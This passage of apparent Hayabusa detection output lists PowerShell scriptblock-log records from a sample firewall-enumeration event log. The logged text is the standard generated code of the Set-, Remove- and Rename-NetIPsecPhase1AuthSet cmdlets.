$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 